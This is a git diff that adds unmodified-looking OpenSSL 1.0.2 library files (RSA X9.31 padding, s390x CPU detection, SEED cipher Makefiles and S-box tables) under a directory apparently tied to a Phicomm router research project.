+            RSAerr(RSA_F_RSA_PADDING_CHECK_X931, RSA_R_INVALID_PADDING);
+            return -1;
+        }
+
+    } else
+        j = flen - 2;
+
+    if (p[j] != 0xCC) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_X931, RSA_R_INVALID_TRAILER);
+        return -1;
+    }
+
+    memcpy(to, p, (unsigned int)j);
+
+    return (j);
+}
+
+/* Translate between X931 hash ids and NIDs */
+
+int RSA_X931_hash_id(int nid)
+{
+    switch (nid) {
+    case NID_sha1:
+        return 0x33;
+
+    case NID_sha256:
+        return 0x34;
+
+    case NID_sha384:
+        return 0x36;
+
+    case NID_sha512:
+        return 0x35;
+
+    }
+    return -1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_x931.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_x931.o
new file mode 100644
index 0000000000000000000000000000000000000000..41a8b66b5d17d0c9e3594f29976c391bef1ef2a2
GIT binary patch
literal 2088
zcmbu8O>EOx5P+YXLIQNtz%B@hzkmdy0=&tV1&R=gY15|2&?@{0@guM6dI?*SR?Z7*
zk)Wv}BwW-L;=maYCr%uzAfP`|AP9-72X06lfm}d6wSx7|*zc9Zm^~~bJ<rVNnR(-R
z&%<%Ky-pAa7l9lkUp-C<c~}3{j@f36{6reaT;s+C$^0mp<%IdV&75p&Dw{6~AL@oS
zbr&-b7mrRv%TI>EdWsd^VQS&Ib$YtfT#&~)gln_8B_;n~l`SQIUtvL@KNsHnWb@g>
zN3u4R(8@=InYjm2i4;4ni8ix*L@UF~acpqzeru^d@Nya(I4QL}&n+8WJ|^8hAY5v&
z_bi$aR7rN4^NBG-kj7&F<mdZxzk=~4I@>aJWz%RdVU_apMY=ja|A?}rQB2xkO;z4B
z&0L$M9}?P3{=k}-bfZ)A2E2ZfheyrFRQ%?oY`&Vif7<S5d=CVSSa<6Pq0!;><IUg}
ztQg%oV%-5YZh;hc1FVEbtb2>(cOZ>zQ`4lQwRL}Z`-z@hhUUU8VzU_872TV&-RRZd
zB4T8BlY=3F;7~)bmcZ&bdV)Z?31mK4D8D$02$z#Y7z_#P8vKEqFhAt$*}D<cXM&+~
z!GO)NH<Z8e5f6syt_K4cFQX6A>Zt#G;t|!8PnK7Z&+~?1&%Eo}ET8?AwG2HUS^6!s
zx&J#n@EwlRtCa?DS5@_C&j{FNSU7LD>;>S(<G`^F&$nj^>@4GrI4F?CnHpJD8Ek2e
ziW*5Clav9qxA#KkyaGx&1(+xua@QeAR=V2TkHwEG$E8DZTp{sfQW?lmMK_Foqb5;H
z=~|zYiuJIDl2WrN<w7s+8^H$%-kBA!KI82K`GOF{&BHb&c+c#`T(Zx_`S*6aIR9QE
zW{1*L?Ey^<N2j=D=oeLy>VuSsy((3S*ptl?QR`2q^$f5~Kh;IJ>$|d4)%uu!K9ds%
zjQ#=LphHBoE9fcZPeV=Xyu}~VVaUd#a^JWZFq9-aN5^wwxs7@qESzNwR*fJ8;pea%
zY%IlZ>RNmWvJDn;_aAc0wJ*k^xbaS4So8npM_EnYC%Cro{daJ{G~b`={lK|h9s1Y{
zdc+<EhJQ8QyK0$W`Qd5^HlH8IJz!v{JO3@q|APlI?an_3-0S=z?EDfe56=&Cc|Jcs
wue~uP#v1Boec(U1%p)I}`|JRbn+&GWsS;Lhk*oyED}Rvne{nI=G2Hq80!tVboB#j-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/s390xcap.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/s390xcap.c
new file mode 100644
index 0000000..47d6b6f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/s390xcap.c
@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <setjmp.h>
+#include <signal.h>
+
+extern unsigned long OPENSSL_s390xcap_P[];
+
+static sigjmp_buf ill_jmp;
+static void ill_handler(int sig)
+{
+    siglongjmp(ill_jmp, sig);
+}
+
+unsigned long OPENSSL_s390x_facilities(void);
+
+void OPENSSL_cpuid_setup(void)
+{
+    sigset_t oset;
+    struct sigaction ill_act, oact;
+
+    if (OPENSSL_s390xcap_P[0])
+        return;
+
+    OPENSSL_s390xcap_P[0] = 1UL << (8 * sizeof(unsigned long) - 1);
+
+    memset(&ill_act, 0, sizeof(ill_act));
+    ill_act.sa_handler = ill_handler;
+    sigfillset(&ill_act.sa_mask);
+    sigdelset(&ill_act.sa_mask, SIGILL);
+    sigdelset(&ill_act.sa_mask, SIGTRAP);
+    sigprocmask(SIG_SETMASK, &ill_act.sa_mask, &oset);
+    sigaction(SIGILL, &ill_act, &oact);
+
+    /* protection against missing store-facility-list-extended */
+    if (sigsetjmp(ill_jmp, 1) == 0)
+        OPENSSL_s390x_facilities();
+
+    sigaction(SIGILL, &oact, NULL);
+    sigprocmask(SIG_SETMASK, &oset, NULL);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/s390xcpuid.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/s390xcpuid.S
new file mode 100644
index 0000000..0681534
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/s390xcpuid.S
@@ -0,0 +1,99 @@
+.text
+
+.globl	OPENSSL_s390x_facilities
+.type	OPENSSL_s390x_facilities,@function
+.align	16
+OPENSSL_s390x_facilities:
+	lghi	%r0,0
+	larl	%r2,OPENSSL_s390xcap_P
+	stg	%r0,8(%r2)
+	.long	0xb2b02000	# stfle	0(%r2)
+	brc	8,.Ldone
+	lghi	%r0,1
+	.long	0xb2b02000	# stfle 0(%r2)
+.Ldone:
+	lg	%r2,0(%r2)
+	br	%r14
+.size	OPENSSL_s390x_facilities,.-OPENSSL_s390x_facilities
+
+.globl	OPENSSL_rdtsc
+.type	OPENSSL_rdtsc,@function
+.align	16
+OPENSSL_rdtsc:
+	stck	16(%r15)
+	lg	%r2,16(%r15)
+	br	%r14
+.size	OPENSSL_rdtsc,.-OPENSSL_rdtsc
+
+.globl	OPENSSL_atomic_add
+.type	OPENSSL_atomic_add,@function
+.align	16
+OPENSSL_atomic_add:
+	l	%r1,0(%r2)
+.Lspin:	lr	%r0,%r1
+	ar	%r0,%r3
+	cs	%r1,%r0,0(%r2)
+	brc	4,.Lspin
+	lgfr	%r2,%r0		# OpenSSL expects the new value
+	br	%r14
+.size	OPENSSL_atomic_add,.-OPENSSL_atomic_add
+
+.globl	OPENSSL_wipe_cpu
+.type	OPENSSL_wipe_cpu,@function
+.align	16
+OPENSSL_wipe_cpu:
+	xgr	%r0,%r0
+	xgr	%r1,%r1
+	lgr	%r2,%r15
+	xgr	%r3,%r3
+	xgr	%r4,%r4
+	lzdr	%f0
+	lzdr	%f1
+	lzdr	%f2
+	lzdr	%f3
+	lzdr	%f4
+	lzdr	%f5
+	lzdr	%f6
+	lzdr	%f7
+	br	%r14
+.size	OPENSSL_wipe_cpu,.-OPENSSL_wipe_cpu
+
+.globl	OPENSSL_cleanse
+.type	OPENSSL_cleanse,@function
+.align	16
+OPENSSL_cleanse:
+#if !defined(__s390x__) && !defined(__s390x)
+	llgfr	%r3,%r3
+#endif
+	lghi	%r4,15
+	lghi	%r0,0
+	clgr	%r3,%r4
+	jh	.Lot
+	clgr	%r3,%r0
+	bcr	8,%r14
+.Little:
+	stc	%r0,0(%r2)
+	la	%r2,1(%r2)
+	brctg	%r3,.Little
+	br	%r14
+.align	4
+.Lot:	tmll	%r2,7
+	jz	.Laligned
+	stc	%r0,0(%r2)
+	la	%r2,1(%r2)
+	brctg	%r3,.Lot
+.Laligned:
+	srlg	%r4,%r3,3
+.Loop:	stg	%r0,0(%r2)
+	la	%r2,8(%r2)
+	brctg	%r4,.Loop
+	lghi	%r4,7
+	ngr	%r3,%r4
+	jnz	.Little
+	br	%r14
+.size	OPENSSL_cleanse,.-OPENSSL_cleanse
+
+.section	.init
+	brasl	%r14,OPENSSL_cpuid_setup
+
+.comm	OPENSSL_s390xcap_P,16,8
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile
new file mode 100644
index 0000000..4bc55e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile
@@ -0,0 +1,106 @@
+#
+# crypto/seed/Makefile
+#
+
+DIR=	seed
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=seed.c seed_ecb.c seed_cbc.c seed_cfb.c seed_ofb.c
+LIBOBJ=seed.o seed_ecb.o seed_cbc.o seed_cfb.o seed_ofb.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= seed.h
+HEADER= seed_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+seed.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+seed.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+seed.o: ../../include/openssl/seed.h ../../include/openssl/stack.h
+seed.o: ../../include/openssl/symhacks.h seed.c seed_locl.h
+seed_cbc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_cbc.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_cbc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_cbc.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_cbc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_cbc.o: seed_cbc.c
+seed_cfb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_cfb.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_cfb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_cfb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_cfb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_cfb.o: seed_cfb.c
+seed_ecb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_ecb.o: ../../include/openssl/opensslconf.h
+seed_ecb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_ecb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_ecb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_ecb.o: seed_ecb.c
+seed_ofb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_ofb.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_ofb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_ofb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_ofb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_ofb.o: seed_ofb.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile.bak
new file mode 100644
index 0000000..4bc55e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile.bak
@@ -0,0 +1,106 @@
+#
+# crypto/seed/Makefile
+#
+
+DIR=	seed
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=seed.c seed_ecb.c seed_cbc.c seed_cfb.c seed_ofb.c
+LIBOBJ=seed.o seed_ecb.o seed_cbc.o seed_cfb.o seed_ofb.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= seed.h
+HEADER= seed_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+seed.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+seed.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+seed.o: ../../include/openssl/seed.h ../../include/openssl/stack.h
+seed.o: ../../include/openssl/symhacks.h seed.c seed_locl.h
+seed_cbc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_cbc.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_cbc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_cbc.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_cbc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_cbc.o: seed_cbc.c
+seed_cfb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_cfb.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_cfb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_cfb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_cfb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_cfb.o: seed_cfb.c
+seed_ecb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_ecb.o: ../../include/openssl/opensslconf.h
+seed_ecb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_ecb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_ecb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_ecb.o: seed_ecb.c
+seed_ofb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_ofb.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_ofb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_ofb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_ofb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_ofb.o: seed_ofb.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile.save
new file mode 100644
index 0000000..4bc55e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/Makefile.save
@@ -0,0 +1,106 @@
+#
+# crypto/seed/Makefile
+#
+
+DIR=	seed
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=seed.c seed_ecb.c seed_cbc.c seed_cfb.c seed_ofb.c
+LIBOBJ=seed.o seed_ecb.o seed_cbc.o seed_cfb.o seed_ofb.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= seed.h
+HEADER= seed_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+seed.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+seed.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+seed.o: ../../include/openssl/seed.h ../../include/openssl/stack.h
+seed.o: ../../include/openssl/symhacks.h seed.c seed_locl.h
+seed_cbc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_cbc.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_cbc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_cbc.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_cbc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_cbc.o: seed_cbc.c
+seed_cfb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_cfb.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_cfb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_cfb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_cfb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_cfb.o: seed_cfb.c
+seed_ecb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_ecb.o: ../../include/openssl/opensslconf.h
+seed_ecb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_ecb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_ecb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_ecb.o: seed_ecb.c
+seed_ofb.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+seed_ofb.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+seed_ofb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+seed_ofb.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+seed_ofb.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+seed_ofb.o: seed_ofb.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.c
new file mode 100644
index 0000000..a905872
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.c
@@ -0,0 +1,711 @@
+/*
+ * Copyright (c) 2007 KISA(Korea Information Security Agency). All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Neither the name of author nor the names of its contributors may
+ *    be used to endorse or promote products derived from this software
+ *    without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+#ifndef OPENSSL_NO_SEED
+
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+# ifdef WIN32
+#  include <memory.h>
+# endif
+
+# include <openssl/crypto.h>
+# include <openssl/seed.h>
+# include "seed_locl.h"
+
+# ifdef SS                      /* can get defined on Solaris by inclusion of
+                                 * <stdlib.h> */
+#  undef SS
+# endif
+
+static const seed_word SS[4][256] = { {
+                                       0x2989a1a8, 0x05858184, 0x16c6d2d4,
+                                       0x13c3d3d0, 0x14445054, 0x1d0d111c,
+                                       0x2c8ca0ac, 0x25052124,
+                                       0x1d4d515c, 0x03434340, 0x18081018,
+                                       0x1e0e121c, 0x11415150, 0x3cccf0fc,
+                                       0x0acac2c8, 0x23436360,
+                                       0x28082028, 0x04444044, 0x20002020,
+                                       0x1d8d919c, 0x20c0e0e0, 0x22c2e2e0,
+                                       0x08c8c0c8, 0x17071314,
+                                       0x2585a1a4, 0x0f8f838c, 0x03030300,
+                                       0x3b4b7378, 0x3b8bb3b8, 0x13031310,
+                                       0x12c2d2d0, 0x2ecee2ec,
+                                       0x30407070, 0x0c8c808c, 0x3f0f333c,
+                                       0x2888a0a8, 0x32023230, 0x1dcdd1dc,
+                                       0x36c6f2f4, 0x34447074,
+                                       0x2ccce0ec, 0x15859194, 0x0b0b0308,
+                                       0x17475354, 0x1c4c505c, 0x1b4b5358,
+                                       0x3d8db1bc, 0x01010100,
+                                       0x24042024, 0x1c0c101c, 0x33437370,
+                                       0x18889098, 0x10001010, 0x0cccc0cc,
+                                       0x32c2f2f0, 0x19c9d1d8,
+                                       0x2c0c202c, 0x27c7e3e4, 0x32427270,
+                                       0x03838380, 0x1b8b9398, 0x11c1d1d0,
+                                       0x06868284, 0x09c9c1c8,
+                                       0x20406060, 0x10405050, 0x2383a3a0,
+                                       0x2bcbe3e8, 0x0d0d010c, 0x3686b2b4,
+                                       0x1e8e929c, 0x0f4f434c,
+                                       0x3787b3b4, 0x1a4a5258, 0x06c6c2c4,
+                                       0x38487078, 0x2686a2a4, 0x12021210,
+                                       0x2f8fa3ac, 0x15c5d1d4,
+                                       0x21416160, 0x03c3c3c0, 0x3484b0b4,
+                                       0x01414140, 0x12425250, 0x3d4d717c,
+                                       0x0d8d818c, 0x08080008,
+                                       0x1f0f131c, 0x19899198, 0x00000000,
+                                       0x19091118, 0x04040004, 0x13435350,
+                                       0x37c7f3f4, 0x21c1e1e0,
+                                       0x3dcdf1fc, 0x36467274, 0x2f0f232c,
+                                       0x27072324, 0x3080b0b0, 0x0b8b8388,
+                                       0x0e0e020c, 0x2b8ba3a8,
+                                       0x2282a2a0, 0x2e4e626c, 0x13839390,
+                                       0x0d4d414c, 0x29496168, 0x3c4c707c,
+                                       0x09090108, 0x0a0a0208,
+                                       0x3f8fb3bc, 0x2fcfe3ec, 0x33c3f3f0,
+                                       0x05c5c1c4, 0x07878384, 0x14041014,
+                                       0x3ecef2fc, 0x24446064,
+                                       0x1eced2dc, 0x2e0e222c, 0x0b4b4348,
+                                       0x1a0a1218, 0x06060204, 0x21012120,
+                                       0x2b4b6368, 0x26466264,
+                                       0x02020200, 0x35c5f1f4, 0x12829290,
+                                       0x0a8a8288, 0x0c0c000c, 0x3383b3b0,
+                                       0x3e4e727c, 0x10c0d0d0,
+                                       0x3a4a7278, 0x07474344, 0x16869294,
+                                       0x25c5e1e4, 0x26062224, 0x00808080,
+                                       0x2d8da1ac, 0x1fcfd3dc,
+                                       0x2181a1a0, 0x30003030, 0x37073334,
+                                       0x2e8ea2ac, 0x36063234, 0x15051114,
+                                       0x22022220, 0x38083038,
+                                       0x34c4f0f4, 0x2787a3a4, 0x05454144,
+                                       0x0c4c404c, 0x01818180, 0x29c9e1e8,
+                                       0x04848084, 0x17879394,
+                                       0x35053134, 0x0bcbc3c8, 0x0ecec2cc,
+                                       0x3c0c303c, 0x31417170, 0x11011110,
+                                       0x07c7c3c4, 0x09898188,
+                                       0x35457174, 0x3bcbf3f8, 0x1acad2d8,
+                                       0x38c8f0f8, 0x14849094, 0x19495158,
+                                       0x02828280, 0x04c4c0c4,
+                                       0x3fcff3fc, 0x09494148, 0x39093138,
+                                       0x27476364, 0x00c0c0c0, 0x0fcfc3cc,
+                                       0x17c7d3d4, 0x3888b0b8,
+                                       0x0f0f030c, 0x0e8e828c, 0x02424240,
+                                       0x23032320, 0x11819190, 0x2c4c606c,
+                                       0x1bcbd3d8, 0x2484a0a4,
+                                       0x34043034, 0x31c1f1f0, 0x08484048,
+                                       0x02c2c2c0, 0x2f4f636c, 0x3d0d313c,
+                                       0x2d0d212c, 0x00404040,
+                                       0x3e8eb2bc, 0x3e0e323c, 0x3c8cb0bc,
+                                       0x01c1c1c0, 0x2a8aa2a8, 0x3a8ab2b8,
+                                       0x0e4e424c, 0x15455154,
+                                       0x3b0b3338, 0x1cccd0dc, 0x28486068,
+                                       0x3f4f737c, 0x1c8c909c, 0x18c8d0d8,
+                                       0x0a4a4248, 0x16465254,
+                                       0x37477374, 0x2080a0a0, 0x2dcde1ec,
+                                       0x06464244, 0x3585b1b4, 0x2b0b2328,
